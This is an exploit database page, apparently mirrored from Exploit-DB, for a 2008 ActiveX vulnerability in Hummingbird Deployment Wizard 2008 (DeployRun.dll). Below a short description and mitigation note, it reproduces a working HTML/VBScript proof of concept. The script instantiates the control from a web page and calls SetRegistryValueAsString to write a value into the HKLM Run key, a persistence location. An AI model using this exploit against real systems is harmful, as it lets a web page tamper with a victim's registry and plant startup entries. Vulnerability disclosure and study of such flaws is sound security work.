header-logo
Suggest Exploit
vendor:
Hummingbird Deployment Wizard 2008
by:
shinnai
7.5
CVSS
HIGH
Registry Values Creation/Change
264
CWE
Product Name: Hummingbird Deployment Wizard 2008
Affected Version From: 10.0.0.44
Affected Version To: 10.0.0.44
Patch Exists: Yes
Related CWE: N/A
CPE: a:hummingbird:hummingbird_deployment_wizard_2008
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional SP3
2008

Hummingbird Deployment Wizard 2008 (DeployRun.dll) Registry Values Creation/Change

Hummingbird Deployment Wizard 2008 (DeployRun.dll) is vulnerable to registry values creation/change. The vulnerable method is Sub SetRegistryValueAsString (ByVal Path As String, ByVal v As String). This exploit was tested on Windows XP Professional SP3 full patched, with Internet Explorer 7.

Mitigation:

Update to the latest version of Hummingbird Deployment Wizard 2008 (DeployRun.dll)
Source

Exploit-DB raw data:

------------------------------------------------------------------------------------
 Hummingbird Deployment Wizard 2008 (DeployRun.dll) Registry Values Creation/Change
 url: http://www.hummingbird.com

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://www.shinnai.net

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.
 
 Info:
 DeployRun.dll <= 10.0.0.44
 
 Marked as:
 RegKey Safe for Script: False
 RegKey Safe for Init: False
 Implements IObjectSafety: True
 IDisp Safe:  Safe for untrusted: caller,data  
 IPersist Safe:  Safe for untrusted: caller,data

 Vulnerable method:
 Sub SetRegistryValueAsString (ByVal Path As String, ByVal v As String)

 Tested on Windows XP Professional SP3 full patched, with Internet Explorer 7

 There are a lot of dangerous methods, just take a look and... good searching
------------------------------------------------------------------------------------
<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
 Sub tryMe
  'test.SetRegistryValueAsString "Existing Registry Path + Existing Registry Key", "Value to change"
  test.SetRegistryValueAsString "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YourFavouriteKey", "Hello World!"
 End Sub
</script>

# milw0rm.com [2008-10-17]

Navigation

Suggest Exploit

Services By CQR